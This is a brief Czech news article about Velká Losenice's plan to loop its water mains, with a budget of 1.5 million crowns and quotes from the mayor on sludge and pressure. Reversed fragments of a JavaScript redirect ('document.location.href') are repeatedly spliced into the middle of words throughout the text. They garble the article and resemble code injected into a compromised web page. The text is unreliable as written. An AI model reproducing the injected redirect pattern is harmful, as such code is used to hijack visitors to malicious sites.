Rainbow page separator

V Losenici chtějí zlepšit vodovodní síť zokruhováním řadů

Neděle, 22. dubna 2018

Kapka vody - www.photohalama.com

Velká Losenice / Zokruhování vodovodních řadů má zlepšit stav vodovodní sítě ve Velké Losenici. V rozpočtu na le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošní rok je pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to počítáno s realizací jednotlivých větví v celkové hodnotě 1,5 milionu korun.
„Po výběrovém řízení budeme znát náklady na jednotlivé okruhy, které se budou dělat ještě le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce,“ informoval starosta Velké Losenice Miloslav Černý. Doplnil rovněž, že na tu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to investiční akci nebylo možné zajistit případnou dotační podporu z důvodu vyhovujících rozborů pitné vody v průběhu minulých let.
„Víme ale o místech v síti, kde dochází k usazování nadměrného množství kalu, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to je třeba řešit. Propojením koncových větví vodovodu dojde i ke zlepšení tlakových poměrů ve vodovodním řadu,“ doplnil starosta.